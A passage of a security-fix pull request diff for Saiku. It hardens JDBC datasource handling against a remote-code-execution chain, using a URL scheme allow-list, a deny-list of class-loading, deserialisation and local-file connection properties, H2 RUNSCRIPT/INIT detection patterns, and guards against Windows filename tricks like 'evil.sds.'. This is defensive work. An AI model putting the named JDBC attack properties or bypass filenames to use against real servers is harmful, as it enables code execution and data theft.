### PR TITLE
fix(security): close the authenticated-user datasource RCE chain (#1902, #1903, #1904)

### DIFF
--- a/saiku-core/saiku-service/src/main/java/mondrian/rolap/M3ToM4Converter.java
+++ b/saiku-core/saiku-service/src/main/java/mondrian/rolap/M3ToM4Converter.java
@@ -9,7 +9,6 @@ import java.lang.reflect.InvocationHandler;
 import java.lang.reflect.Method;
 import java.lang.reflect.Proxy;
 import java.sql.Connection;
-import java.sql.DriverManager;
 import java.util.Locale;
 import java.util.Properties;
 import java.util.logging.Logger;
@@ -20,6 +19,7 @@ import mondrian.util.ByteString;
 import org.eigenbase.xom.DOMWrapper;
 import org.eigenbase.xom.Parser;
 import org.eigenbase.xom.XOMUtil;
+import org.saiku.service.datasource.JdbcUrlPolicy;
 
 /**
  * Converts a Mondrian&nbsp;3 (legacy) schema XML to a real Mondrian&nbsp;4
@@ -177,7 +177,8 @@ public final class M3ToM4Converter {
                 if (password != null) {
                     props.put("password", password);
                 }
-                this.shared = DriverManager.getConnection(url, props);
+                // saiku#1902: same URL policy as every other DriverManager chokepoint.
+                this.shared = JdbcUrlPolicy.openConnection(url, props);
             } catch (java.sql.SQLException e) {
                 throw new IllegalStateException("could not open warehouse connection for conversion", e);
             }

--- a/saiku-core/saiku-service/src/main/java/org/saiku/datasources/connection/AbstractConnectionManager.java
+++ b/saiku-core/saiku-service/src/main/java/org/saiku/datasources/connection/AbstractConnectionManager.java
@@ -28,6 +28,7 @@ import org.saiku.datasources.datasource.SaikuDatasource;
 import org.saiku.olap.util.exception.SaikuOlapException;
 import org.saiku.service.datasource.IDatasourceManager;
 import org.saiku.service.datasource.IDatasourceProcessor;
+import org.saiku.service.datasource.JdbcUrlPolicy;
 import org.saiku.service.user.UserService;
 import org.saiku.service.util.exception.SaikuServiceException;
 import org.slf4j.Logger;
@@ -88,9 +89,11 @@ public abstract class AbstractConnectionManager implements IConnectionManager, S
                     .split(",");
             for (String processor : processors) {
                 try {
-                    @SuppressWarnings("unchecked")
-                    final Class<IDatasourceProcessor> clazz = (Class<IDatasourceProcessor>) Class.forName(processor);
-                    final Constructor<IDatasourceProcessor> ctor = clazz.getConstructor();
+                    // saiku#1902: load without initialising and check the type BEFORE the class
+                    // runs any code, so a mis-configured name can't act as a static-init gadget.
+                    final Class<? extends IDatasourceProcessor> clazz =
+                            JdbcUrlPolicy.loadImplementation(processor.trim(), IDatasourceProcessor.class);
+                    final Constructor<? extends IDatasourceProcessor> ctor = clazz.getConstructor();
                     final IDatasourceProcessor dsProcessor = ctor.newInstance();
                     datasource = dsProcessor.process(datasource);
                 } catch (Exception e) {
@@ -110,9 +113,10 @@ public abstract class AbstractConnectionManager implements IConnectionManager, S
                     .split(",");
             for (String processor : processors) {
                 try {
-                    @SuppressWarnings("unchecked")
-                    final Class<IConnectionProcessor> clazz = (Class<IConnectionProcessor>) Class.forName(processor);
-                    final Constructor<IConnectionProcessor> ctor = clazz.getConstructor();
+                    // saiku#1902: see preProcess — type-check before initialising.
+                    final Class<? extends IConnectionProcessor> clazz =
+                            JdbcUrlPolicy.loadImplementation(processor.trim(), IConnectionProcessor.class);
+                    final Constructor<? extends IConnectionProcessor> ctor = clazz.getConstructor();
                     final IConnectionProcessor conProcessor = ctor.newInstance();
                     return conProcessor.process(con);
                 } catch (Exception e) {

--- a/saiku-core/saiku-service/src/main/java/org/saiku/datasources/connection/SaikuOlapConnection.java
+++ b/saiku-core/saiku-service/src/main/java/org/saiku/datasources/connection/SaikuOlapConnection.java
@@ -18,11 +18,11 @@ package org.saiku.datasources.connection;
 import static org.saiku.datasources.connection.encrypt.CryptoUtil.decrypt;
 
 import java.sql.Connection;
-import java.sql.DriverManager;
 import java.util.Properties;
 import mondrian.rolap.RolapConnection;
 import org.olap4j.OlapConnection;
 import org.olap4j.OlapWrapper;
+import org.saiku.service.datasource.JdbcUrlPolicy;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
@@ -125,8 +125,15 @@ public class SaikuOlapConnection implements ISaikuConnection {
                     }
                 }
 
-                Class.forName(driver);
-                Connection connection = DriverManager.getConnection(url, username, password);
+                // saiku#1902: this is THE chokepoint — every load path (admin add, .sds descriptor
+                // read at boot / on /discover/refresh, datasource save) funnels through here, so the
+                // policy is applied to the FINAL url, after JdbcUser=/JdbcPassword= were appended
+                // above. Checking earlier would let a ';'-injected username re-point Jdbc= behind
+                // the check. The driver class is only initialised once it is known to be a
+                // java.sql.Driver, so a descriptor can't run an arbitrary static initialiser.
+                JdbcUrlPolicy.validate(url);
+                JdbcUrlPolicy.loadDriverClass(driver);
+                Connection connection = JdbcUrlPolicy.openConnection(url, username, password);
 
                 if (connection != null) {
                     final OlapWrapper wrapper = (OlapWrapper) connection;

--- a/saiku-core/saiku-service/src/main/java/org/saiku/datasources/connection/SaikuOssieConnection.java
+++ b/saiku-core/saiku-service/src/main/java/org/saiku/datasources/connection/SaikuOssieConnection.java
@@ -14,6 +14,7 @@ import java.sql.Connection;
 import java.sql.DriverManager;
 import java.util.Objects;
 import java.util.Properties;
+import org.saiku.service.datasource.JdbcUrlPolicy;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
@@ -118,6 +119,11 @@ public class SaikuOssieConnection implements ISaikuConnection {
         // ServiceLoader auto-registration doesn't reliably scan — so the DBCP2 pool inside
         // OssieSchemaFactory can otherwise fail with "Cannot create JDBC driver of class ''".
         // An explicit `driver` property wins; otherwise infer the well-known jdbc:quack driver.
+        // saiku#1902: the warehouse URL is the descriptor-controlled input here. It is validated
+        // BEFORE the driver class is touched and before it is baked into the Calcite model, so an
+        // Ossie datasource is held to the same policy as an OLAP one.
+        JdbcUrlPolicy.validate(warehouseUrl);
+
         String warehouseDriver = props.getProperty(DRIVER_KEY);
         if ((warehouseDriver == null || warehouseDriver.isBlank())
                 && warehouseUrl != null
@@ -126,7 +132,9 @@ public class SaikuOssieConnection implements ISaikuConnection {
         }
         if (warehouseDriver != null && !warehouseDriver.isBlank()) {
             try {
-                Class.forName(warehouseDriver);
+                // Type-checked before initialisation: a descriptor can't name an arbitrary class
+                // just to run its static initialiser.
+                JdbcUrlPolicy.loadDriverClass(warehouseDriver);
             } catch (ClassNotFoundException e) {
                 log.warn("Warehouse JDBC driver '{}' not found on the classpath", warehouseDriver);
             }
@@ -134,7 +142,10 @@ public class SaikuOssieConnection implements ISaikuConnection {
 
         String calciteUrl = buildCalciteConnectString(Path.of(ossieYaml), modelName, warehouseUrl, user, password);
         // The Calcite driver reads the model + operand from the URL — no user/pass params
-        // needed here since we baked the warehouse creds into the operand.
+        // needed here since we baked the warehouse creds into the operand. This URL is assembled
+        // by Saiku around a temp model file it just wrote (jdbc:calcite: is deliberately NOT a
+        // user-facing scheme in JdbcUrlPolicy); the only descriptor-controlled part — the
+        // warehouse URL — was validated above and is JSON-escaped into the operand.
         this.calciteConnection = DriverManager.getConnection(calciteUrl);
         this.initialized = true;
         log.info("Ossie connection '{}' opened against Ossie YAML {}", name, ossieYaml);
@@ -198,25 +209,34 @@ public class SaikuOssieConnection implements ISaikuConnection {
             String warehouseUser,
             String warehousePassword) {
         StringBuilder operand = new StringBuilder();
+        // saiku#1902: every descriptor-controlled value is JSON-escaped. Unescaped, a '"' in the
+        // warehouse URL / user / password / schema could close the operand and append a second
+        // Calcite schema (e.g. a "jdbc" type with an arbitrary jdbcUrl) to the model document.
         operand.append("\"ossieYaml\": \"")
-                .append(Objects.requireNonNull(ossieYaml, "ossieYaml")
-                        .toString()
-                        .replace("\\", "\\\\"))
+                .append(jsonEscape(
+                        Objects.requireNonNull(ossieYaml, "ossieYaml").toString()))
                 .append("\"");
         if (warehouseJdbcUrl != null && !warehouseJdbcUrl.isBlank()) {
-            operand.append(",\"jdbcUrl\": \"").append(warehouseJdbcUrl).append("\"");
+            operand.append(",\"jdbcUrl\": \"")
+                    .append(jsonEscape(warehouseJdbcUrl))
+                    .append("\"");
         }
         if (warehouseUser != null) {
-            operand.append(",\"jdbcUser\": \"").append(warehouseUser).append("\"");
+            operand.append(",\"jdbcUser\": \"")
+                    .append(jsonEscape(warehouseUser))
+                    .append("\"");
         }
         if (warehousePassword != null) {
-            operand.append(",\"jdbcPassword\": \"").append(warehousePassword).append("\"");
+            operand.append(",\"jdbcPassword\": \"")
+                    .append(jsonEscape(warehousePassword))
+                    .append("\"");
         }
+        String schema = jsonEscape(schemaName);
         String modelJson = "{\n"
                 + "  \"version\": \"1.0\",\n"
-                + "  \"defaultSchema\": \"" + schemaName + "\",\n"
+                + "  \"defaultSchema\": \"" + schema + "\",\n"
                 + "  \"schemas\": [{\n"
-                + "    \"name\": \"" + schemaName + "\",\n"
+                + "    \"name\": \"" + schema + "\",\n"
                 + "    \"type\": \"custom\",\n"
                 + "    \"factory\": \"bi.saiku.ossie.sql.internal.OssieSchemaFactory\",\n"
                 + "    \"operand\": {" + operand + "}\n"
@@ -230,5 +250,31 @@ public class SaikuOssieConnection implements ISaikuConnection {
         } catch (IOException e) {
             throw new UncheckedIOException("Failed to stage Calcite model.json", e);
         }
+    }
+
+    /** Minimal JSON string escaping for the hand-built model document. */
+    static String jsonEscape(String s) {
+        if (s == null) {
+            return "";
+        }
+        StringBuilder out = new StringBuilder(s.length() + 8);
+        for (int i = 0; i < s.length(); i++) {
+            char c = s.charAt(i);
+            switch (c) {
+                case '"' -> out.append("\\\"");
+                case '\\' -> out.append("\\\\");
+                case '\n' -> out.append("\\n");
+                case '\r' -> out.append("\\r");
+                case '\t' -> out.append("\\t");
+                default -> {
+                    if (c < 0x20) {
+                        out.append(String.format("\\u%04x", (int) c));
+                    } else {
+                        out.append(c);
+                    }
+                }
+            }
+        }
+        return out.toString();
     }
 }

--- a/saiku-core/saiku-service/src/main/java/org/saiku/repository/Acl2.java
+++ b/saiku-core/saiku-service/src/main/java/org/saiku/repository/Acl2.java
@@ -377,7 +377,12 @@ class Acl2 {
 
                         break;
                     default:
-                        method = AclMethod.WRITE;
+                        // saiku#1904: PUBLIC (and any un-cased type) used to resolve to WRITE, so
+                        // every authenticated user could overwrite the seeded /datasources tree and
+                        // plant a datasource descriptor. PUBLIC now means world-READABLE; writes
+                        // require an explicit SECURED grant, ownership, or an admin role (which
+                        // short-circuits above).
+                        method = AclMethod.READ;
                         break;
                 }
             } else {

--- a/saiku-core/saiku-service/src/main/java/org/saiku/repository/FilesystemRepositoryManager.java
+++ b/saiku-core/saiku-service/src/main/java/org/saiku/repository/FilesystemRepositoryManager.java
@@ -131,8 +131,12 @@ public class FilesystemRepositoryManager implements IRepositoryManager {
      * <ul>
      *   <li><b>/homes/</b> — SECURED, defaultRole READ. Per-user PRIVATE folders
      *       are added on first login via {@link #createUser(String)}.</li>
-     *   <li><b>/datasources/</b> — PUBLIC, ROLE_ADMIN WRITE/READ/GRANT. Authenticated
-     *       users can READ (rootMethod fallback); only admins mutate.</li>
+     *   <li><b>/datasources/</b> — SECURED, ROLE_ADMIN WRITE/READ/GRANT, nothing for anyone
+     *       else. saiku#1904: this was PUBLIC, and PUBLIC resolved to WRITE for every
+     *       authenticated user, so any account could drop a datasource descriptor here
+     *       (the write half of the saiku#1902/#1903 RCE chain). Descriptors carry warehouse
+     *       credentials and are consumed server-side, so non-admins have no reason to see
+     *       them either.</li>
      *   <li><b>/dashboards/</b> — SECURED, ROLE_ADMIN WRITE/READ/GRANT. User-saved
      *       dashboards live under {@code /homes/<user>/} where the home ACL applies;
      *       the top-level folder is admin-only-write to prevent cross-user clobber
@@ -140,7 +144,8 @@ public class FilesystemRepositoryManager implements IRepositoryManager {
      *   <li><b>/queries/</b> — SECURED, ROLE_ADMIN WRITE/READ/GRANT. Same rationale
      *       as {@code /dashboards/}.</li>
      *   <li><b>/legacyreports/</b> — PUBLIC, ROLE_ADMIN WRITE/READ/GRANT. Mirrors
-     *       historical behaviour.</li>
+     *       historical behaviour; since saiku#1904 PUBLIC grants READ, not WRITE, to
+     *       non-admins.</li>
      * </ul>
      *
      * <p>Historical bug fixed inline: prior code captured one {@code File n} for
@@ -151,7 +156,9 @@ public class FilesystemRepositoryManager implements IRepositoryManager {
      */
     private void seedSkeleton() throws RepositoryException {
         seedAcl(this.createFolder(sep + "homes"), homesGrant());
-        seedAcl(this.createFolder(sep + "datasources"), publicAdminGrant());
+        // saiku#1904: admin-only. Re-applied on every start(), so an established home is
+        // tightened on its next boot without a migration step.
+        seedAcl(this.createFolder(sep + "datasources"), securedAdminGrant());
         seedAcl(this.createFolder(sep + "dashboards"), securedAdminGrant());
         seedAcl(this.createFolder(sep + "queries"), securedAdminGrant());
         seedAcl(this.createFolder(sep + "legacyreports"), publicAdminGrant());
@@ -247,6 +254,49 @@ public class FilesystemRepositoryManager implements IRepositoryManager {
         return false;
     }
 
+    /**
+     * saiku#1903: is {@code path} a datasource descriptor ({@code *.sds}, any case) or anything
+     * under the {@code /datasources} tree? Both are consumed by the datasource loader, which lists
+     * {@code *.sds} recursively across the whole datadir — so a descriptor written into a user's
+     * own home is loaded (and its JDBC URL connected) exactly like one in {@code /datasources}.
+     */
+    static boolean isDatasourceDescriptorPath(String path) {
+        if (path == null) {
+            return false;
+        }
+        String p = path.replace('\\', '/').trim().toLowerCase(java.util.Locale.ROOT);
+        while (p.startsWith("./")) {
+            p = p.substring(2);
+        }
+        if (p.endsWith(".sds")) {
+            return true;
+        }
+        String noLead = p.startsWith("/") ? p.substring(1) : p;
+        return noLead.equals("datasources") || noLead.startsWith("datasources/") || p.contains("/datasources/");
+    }
+
+    /**
+     * Refuse a descriptor write unless {@code roles} carries an admin role. Enforced here — the
+     * layer every REST save/move funnels through — rather than only at the resource, so a new
+     * caller can't reopen the write half of the saiku#1902 chain by accident. Admin-side writes
+     * ({@code saveDataSource}, internal files) don't pass through here and are unaffected.
+     */
+    private void requireAdminForDatasourceDescriptor(String path, List<String> roles) {
+        if (!isDatasourceDescriptorPath(path)) {
+            return;
+        }
+        List<String> adminRoles = userService != null ? userService.getAdminRoles() : null;
+        if (adminRoles == null || adminRoles.isEmpty()) {
+            adminRoles = java.util.Collections.singletonList("ROLE_ADMIN");
+        }
+        if (roles != null && !java.util.Collections.disjoint(roles, adminRoles)) {
+            return;
+        }
+        log.warn("Refused non-admin write of a datasource descriptor (saiku#1903): {}", path);
+        throw new SaikuServiceException(
+                "Datasource descriptors (.sds) and the /datasources tree can only be modified by an administrator");
+    }
+
     public Object saveFile(Object file, String path, String user, String type, List<String> roles)
             throws RepositoryException {
         if (file == null) {
@@ -290,6 +340,10 @@ public class FilesystemRepositoryManager implements IRepositoryManager {
             // separatorless path as living at the repository root, so it resolves
             // to a real parent folder and the canWrite gate below still runs.
             String parentPath = pos >= 0 ? path.substring(0, pos) : sep;
+            // saiku#1903: datasource descriptors are admin-only, wherever they land. The
+            // loader lists *.sds recursively across the whole datadir, so a descriptor in a
+            // user's own (writable) home is picked up exactly like one in /datasources.
+            requireAdminForDatasourceDescriptor(path, roles);
             File parent = getFolder(parentPath);
             // saiku#895: gate the write on canWrite. #940: when OVERWRITING an
             // existing file, check that file's own ACL (which inherits the
@@ -364,6 +418,8 @@ public class FilesystemRepositoryManager implements IRepositoryManager {
         if (!srcAcl.canWrite(src, user, roles)) {
             throw new SaikuServiceException("You don't have permission to move " + source);
         }
+        // saiku#1903: a rename into *.sds (or into /datasources) is a descriptor write.
+        requireAdminForDatasourceDescriptor(target, roles);
         File dest = getNode(target);
         if (dest.exists()) {
             throw new RepositoryException("Cannot move: target already exists (" + target + ")");

--- a/saiku-core/saiku-service/src/main/java/org/saiku/repository/FilesystemRepositoryManager.java
+++ b/saiku-core/saiku-service/src/main/java/org/saiku/repository/FilesystemRepositoryManager.java
@@ -259,6 +259,11 @@ public class FilesystemRepositoryManager implements IRepositoryManager {
      * under the {@code /datasources} tree? Both are consumed by the datasource loader, which lists
      * {@code *.sds} recursively across the whole datadir — so a descriptor written into a user's
      * own home is loaded (and its JDBC URL connected) exactly like one in {@code /datasources}.
+     *
+     * <p>The check is made against the name the file would actually have <em>on disk</em>: Win32
+     * silently strips trailing dots and spaces and treats an NTFS alternate-data-stream suffix as
+     * the base file, so {@code evil.sds.}, {@code "evil.sds "} and {@code evil.sds::$DATA} all land
+     * as {@code evil.sds} and would otherwise slip past a naive {@code endsWith(".sds")}.
      */
     static boolean isDatasourceDescriptorPath(String path) {
         if (path == null) {
@@ -268,11 +273,31 @@ public class FilesystemRepositoryManager implements IRepositoryManager {
         while (p.startsWith("./")) {
             p = p.substring(2);
         }
+        p = stripWindowsFilenameTail(p);
         if (p.endsWith(".sds")) {
             return true;
         }
         String noLead = p.startsWith("/") ? p.substring(1) : p;
         return noLead.equals("datasources") || noLead.startsWith("datasources/") || p.contains("/datasources/");
+    }
+
+    /**
+     * Normalise a repository path to the name Win32 would actually create on disk: drop an NTFS
+     * alternate-data-stream suffix on the final segment (everything from the first {@code :} after
+     * the last {@code /} — repository paths are relative, so there is no drive-letter colon), then
+     * strip trailing dots and spaces. Shared by both saiku#1903 descriptor guards.
+     */
+    static String stripWindowsFilenameTail(String p) {
+        int lastSlash = p.lastIndexOf('/');
+        int colon = p.indexOf(':', lastSlash + 1);
+        if (colon >= 0) {
+            p = p.substring(0, colon);
+        }
+        int end = p.length();
+        while (end > 0 && (p.charAt(end - 1) == '.' || p.charAt(end - 1) == ' ')) {
+            end--;
+        }
+        return p.substring(0, end);
     }
 
     /**

--- a/saiku-core/saiku-service/src/main/java/org/saiku/service/datasource/JdbcUrlPolicy.java
+++ b/saiku-core/saiku-service/src/main/java/org/saiku/service/datasource/JdbcUrlPolicy.java
@@ -1,0 +1,571 @@
+/*
+ *   Copyright 2026 Spicule Ltd
+ *
+ *   Licensed under the Apache License, Version 2.0 (the "License");
+ *   you may not use this file except in compliance with the License.
+ *   You may obtain a copy of the License at
+ *
+ *   http://www.apache.org/licenses/LICENSE-2.0
+ *
+ *   Unless required by applicable law or agreed to in writing, software
+ *   distributed under the License is distributed on an "AS IS" BASIS,
+ *   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ *   See the License for the specific language governing permissions and
+ *   limitations under the License.
+ */
+package org.saiku.service.datasource;
+
+import java.io.ByteArrayOutputStream;
+import java.nio.charset.StandardCharsets;
+import java.sql.Connection;
+import java.sql.DriverManager;
+import java.sql.SQLException;
+import java.util.ArrayList;
+import java.util.HashSet;
+import java.util.LinkedHashMap;
+import java.util.List;
+import java.util.Locale;
+import java.util.Map;
+import java.util.Properties;
+import java.util.Set;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+
+/**
+ * The connection-time policy for every JDBC URL Saiku hands to {@link DriverManager}
+ * (saiku#1902 / saiku#1903 / saiku#1904).
+ *
+ * <p>A datasource's JDBC URL reaches the driver from several directions — the admin REST add
+ * path, an {@code .sds} descriptor read off the repository at boot or on {@code /discover/refresh},
+ * the Ossie warehouse connection, the cube designer's preview and the schema generator. Modern JDBC
+ * drivers treat certain URL parameters as <em>code</em>: pgjdbc and mssql-jdbc instantiate an
+ * arbitrary class named in {@code socketFactory} / {@code sslfactory} (CVE-2022-21724 class),
+ * Connector/J deserialises server-supplied bytes under {@code autoDeserialize} and loads
+ * interceptor / plugin classes by name, H2 executes SQL from {@code INIT=RUNSCRIPT FROM '...'},
+ * Calcite instantiates schema factories from a {@code model=} document, and a Mondrian
+ * {@code DataSource=} is a raw JNDI lookup. With Spring, Calcite and several drivers on the
+ * runtime classpath, any one of those is remote code execution on the server.
+ *
+ * <p>This class is therefore applied at the <b>chokepoint</b> — immediately before the driver is
+ * touched — so it does not matter which path produced the URL. It enforces:
+ *
+ * <ul>
+ *   <li>a strict <b>scheme allow-list</b> ({@link #BUILT_IN_SCHEMES}; extend with the
+ *       {@value #ALLOWED_SCHEMES_PROPERTY} system property), so only drivers Saiku ships or that an
+ *       operator has consciously dropped into {@code saiku-home/plugins/} are reachable;
+ *   <li>a driver-independent <b>connection-property deny-list</b> for the class-loading,
+ *       deserialisation, local-file and JNDI families, matched case-insensitively, after
+ *       percent-decoding, with key-noise ({@code _ - . whitespace}) stripped so obfuscated
+ *       spellings are caught;
+ *   <li>the H2 executable tokens ({@code INIT=}, {@code RUNSCRIPT}, {@code CREATE ALIAS/TRIGGER/FORCE},
+ *       {@code SHUTDOWN});
+ *   <li>Mondrian wrapper rules: every nested {@code Jdbc=} sub-URL is validated recursively, and
+ *       {@code DataSource=} must be a plain JNDI name, never an {@code ldap:}/{@code rmi:}-style
+ *       URL.
+ * </ul>
+ *
+ * <p>Rejections throw {@link IllegalArgumentException} with a short reason that never echoes the
+ * URL (it may carry credentials). {@link #openConnection} and {@link #loadDriverClass} are the
+ * preferred entry points: they validate and then do the work, so a call site cannot forget the
+ * check.
+ */
+public final class JdbcUrlPolicy {
+
+    private static final Logger LOG = LoggerFactory.getLogger(JdbcUrlPolicy.class);
+
+    /**
+     * Comma-separated list of additional JDBC sub-schemes (the token between {@code jdbc:} and the
+     * next {@code :}) an operator allows beyond {@link #BUILT_IN_SCHEMES}, e.g.
+     * {@code -Dsaiku.jdbc.allowedSchemes=exa,sap}. The property deny-list still applies to them.
+     */
+    public static final String ALLOWED_SCHEMES_PROPERTY = "saiku.jdbc.allowedSchemes";
+
+    private static final String PREFIX = "jdbc:";
+
+    private JdbcUrlPolicy() {}
+
+    /**
+     * JDBC sub-schemes accepted without configuration. The first group is what the launcher /
+     * webapp bundle, the second the olap4j wrappers Saiku itself speaks, the rest the warehouse and
+     * lakehouse drivers an operator commonly drops into {@code saiku-home/plugins/}. Deliberately
+     * absent: {@code calcite} / {@code avatica} — Saiku builds its own Calcite URLs internally for
+     * Ossie and never accepts one from a datasource descriptor, because a Calcite {@code model=}
+     * can name an arbitrary schema-factory class or nest any other JDBC URL.
+     */
+    static final Set<String> BUILT_IN_SCHEMES = Set.of(
+            // bundled
+            "h2",
+            "hsqldb",
+            "postgresql",
+            "mysql",
+            "mysql+srv",
+            "mariadb",
+            "jtds",
+            "hive2",
+            "quack",
+            // olap4j wrappers Saiku speaks (jdbc:mondrian: is handled structurally, see below)
+            "xmla",
+            // common warehouse / lakehouse / embedded drivers
+            "sqlserver",
+            "oracle",
+            "db2",
+            "as400",
+            "informix-sqli",
+            "sybase",
+            "firebirdsql",
+            "sap",
+            "derby",
+            "sqlite",
+            "duckdb",
+            "trino",
+            "presto",
+            "spark",
+            "databricks",
+            "impala",
+            "drill",
+            "phoenix",
+            "kylin",
+            "pinot",
+            "dremio",
+            "athena",
+            "awsathena",
+            "redshift",
+            "snowflake",
+            "bigquery",
+            "clickhouse",
+            "ch",
+            "vertica",
+            "teradata",
+            "netezza",
+            "exa",
+            "greenplum",
+            "monetdb",
+            "singlestore",
+            "starrocks",
+            "doris",
+            "yugabytedb",
+            "cockroachdb",
+            "crate",
+            "questdb",
+            "timescaledb",
+            "materialize",
+            "firebolt",
+            "elasticsearch",
+            "opensearch",
+            "ignite");
+
+    /**
+     * Connection-property keys that are never legitimate in a datasource URL, in normalised form
+     * (lower-case, {@code _ - . whitespace} removed). Grouped by the primitive they hand an
+     * attacker.
+     */
+    static final Set<String> DENIED_KEYS = Set.of(
+            // arbitrary class instantiation (pgjdbc, mssql-jdbc, Connector/J, MariaDB)
+            "sslhostnameverifier",
+            "sslpasswordcallback",
+            "authenticationpluginclassname",
+            "authenticationplugins",
+            "defaultauthenticationplugin",
+            "queryinterceptors",
+            "statementinterceptors",
+            "exceptioninterceptors",
+            "connectionlifecycleinterceptors",
+            "propertiestransform",
+            "clientinfoprovider",
+            "loadbalancestrategy",
+            "haloadbalancestrategy",
+            "loadbalanceexceptionchecker",
+            "serverconfigcachefactory",
+            "parseinfocachefactory",
+            "queryinfocachefactory",
+            "accesstokencallbackclass",
+            // deserialisation of server-controlled bytes / local-file exfiltration (Connector/J, MariaDB)
+            "autodeserialize",
+            "allowloadlocalinfile",
+            "allowloadlocalinfileinpath",
+            "allowurlinlocalinfile",
+            "allowlocalinfile",
+            // arbitrary file write (pgjdbc)
+            "loggerfile",
+            // H2 class hook
+            "javaobjectserializer",
+            // DuckDB / Quack: loading UNSIGNED native extensions, or signed ones from a
+            // non-official repository. (autoload/autoinstall of the official, signed extension
+            // set and extension_directory are ordinary hardening/config knobs and stay allowed —
+            // saiku-cloud's synthetic jdbc:duckdb:r2:// upload URLs rely on httpfs autoloading.)
+            "allowunsignedextensions",
+            "customextensionrepository");
+
+    /** Prefix matches, normalised: {@code socketFactory*}, {@code sslfactory*}, {@code java.naming.*}. */
+    static final String[] DENIED_KEY_PREFIXES = {"socketfactory", "sslfactory", "javanaming"};
+
+    /** Calcite / Avatica operands that name a document or class to instantiate. */
+    static final Set<String> DENIED_CALCITE_KEYS = Set.of("model", "schemafactory", "schematype");
+
+    /* H2 executable tokens. Matched case-insensitively against the (sub-)URL. */
+    private static final Pattern H2_INIT = Pattern.compile("(?i)\\bINIT\\s*=");
+
+    private static final Pattern H2_RUNSCRIPT = Pattern.compile("(?i)\\bRUNSCRIPT\\b");
+
+    private static final Pattern H2_CREATE_EXEC = Pattern.compile("(?i)\\bCREATE\\s+(ALIAS|TRIGGER|FORCE)\\b");
+
+    private static final Pattern H2_SHUTDOWN = Pattern.compile("(?i);\\s*SHUTDOWN\\b");
+
+    /**
+     * Keys of Mondrian's connect-string grammar ({@code RolapConnectionProperties} plus Saiku's own
+     * {@code Mondrian=4} marker). A key opens the body or follows a {@code ;}; a value runs to the
+     * next such key, which is what lets an inner {@code Jdbc=} URL carry its own {@code ;}-params.
+     */
+    private static final Pattern MONDRIAN_KEY = Pattern.compile("(?i)(?:^|;)\\s*(Provider|Jdbc|JdbcDrivers|JdbcUser|"
+            + "JdbcPassword|Catalog|CatalogContent|CatalogName|DataSource|PoolNeeded|Role|UseContentChecksum|"
+            + "DynamicSchemaProcessor|Locale|DataSourceChangeListener|Ignore|Instance|JdbcConnectionUuid|"
+            + "PinSchemaTimeout|AggregateScanSchema|AggregateScanCatalog|UseSchemaPool|Mondrian)\\s*=");
+
+    /** Legacy Saiku 3 form: {@code Mondrian=4; jdbc:mondrian:...}. Stripped before validation. */
+    private static final Pattern LEGACY_MONDRIAN4_PREFIX = Pattern.compile("(?i)^\\s*Mondrian\\s*=\\s*4\\s*;\\s*");
+
+    private static final Pattern URL_SCHEME_PREFIX = Pattern.compile("^([A-Za-z][A-Za-z0-9+.-]*):");
+
+    private static final Pattern SCHEME_TOKEN = Pattern.compile("[a-z0-9+.-]+");
+
+    private static final Pattern SCHEME_HEAD = Pattern.compile("(?i)^jdbc:[a-z0-9+.-]*:");
+
+    private static final Pattern PROPERTY_DELIMITERS = Pattern.compile("[;&?#]");
+
+    private static final Pattern KEY_NOISE = Pattern.compile("[\\s_.\\-'\"]");
+
+    private static final int MAX_NESTING = 2;
+
+    /**
+     * Validate a JDBC URL or datasource {@code location=} value (which may be a Mondrian / XMLA
+     * wrapper). {@code null} and blank input are accepted as "nothing to check" — the caller's
+     * own null handling applies.
+     *
+     * @throws IllegalArgumentException when the URL is not permitted; the message never contains
+     *     the URL itself
+     */
+    public static void validate(String jdbcUrlOrLocation) {
+        if (jdbcUrlOrLocation == null) {
+            return;
+        }
+        String url = jdbcUrlOrLocation.trim();
+        if (url.isEmpty()) {
+            return;
+        }
+        url = LEGACY_MONDRIAN4_PREFIX.matcher(url).replaceFirst("");
+        checkUrl(url, 0);
+    }
+
+    /** Validate, then {@link DriverManager#getConnection(String, String, String)}. */
+    public static Connection openConnection(String url, String user, String password) throws SQLException {
+        validate(url);
+        return DriverManager.getConnection(url, user, password);
+    }
+
+    /** Validate, then {@link DriverManager#getConnection(String, Properties)}. */
+    public static Connection openConnection(String url, Properties info) throws SQLException {
+        validate(url);
+        return DriverManager.getConnection(url, info);
+    }
+
+    /**
+     * Load (and only then initialise) a JDBC driver class named by a datasource descriptor.
+     *
+     * <p>{@code Class.forName(name)} runs the static initialiser of <em>whatever</em> class is
+     * named, so a descriptor-supplied name is a code-execution primitive independent of the URL.
+     * This loads the class <b>without</b> initialisation first, refuses anything that is not a
+     * {@link java.sql.Driver}, and initialises only after that check passed (initialisation is
+     * what registers the driver with {@link DriverManager}, so the caller's contract is unchanged).
+     *
+     * @throws IllegalArgumentException when the class exists but is not a JDBC driver
+     * @throws ClassNotFoundException when no such class is visible
+     */
+    public static Class<?> loadDriverClass(String className) throws ClassNotFoundException {
+        return loadImplementation(className, java.sql.Driver.class);
+    }
+
+    /**
+     * Load a class by name and initialise it only once it is known to implement {@code type}. Same
+     * rationale as {@link #loadDriverClass}; used for the datasource / connection processor hooks.
+     */
+    public static <T> Class<? extends T> loadImplementation(String className, Class<T> type)
+            throws ClassNotFoundException {
+        if (className == null || className.trim().isEmpty()) {
+            throw new IllegalArgumentException("Invalid datasource class name: empty");
+        }
+        String name = className.trim();
+        Class<?> uninitialised = loadWithoutInitialising(name);
+        if (!type.isAssignableFrom(uninitialised)) {
+            LOG.warn("Rejected datasource class: not a {}", type.getSimpleName());
+            throw new IllegalArgumentException("Invalid datasource class: not a " + type.getName() + " implementation");
+        }
+        ClassLoader loader = uninitialised.getClassLoader();
+        Class<?> initialised = loader == null ? Class.forName(name) : Class.forName(name, true, loader);
+        return initialised.asSubclass(type);
+    }
+
+    private static Class<?> loadWithoutInitialising(String name) throws ClassNotFoundException {
+        ClassLoader own = JdbcUrlPolicy.class.getClassLoader();
+        try {
+            return Class.forName(name, false, own);
+        } catch (ClassNotFoundException e) {
+            ClassLoader tccl = Thread.currentThread().getContextClassLoader();
+            if (tccl != null && tccl != own) {
+                return Class.forName(name, false, tccl);
+            }
+            throw e;
+        }
+    }
+
+    // ---------------------------------------------------------------- internals
+
+    private static void checkUrl(String url, int depth) {
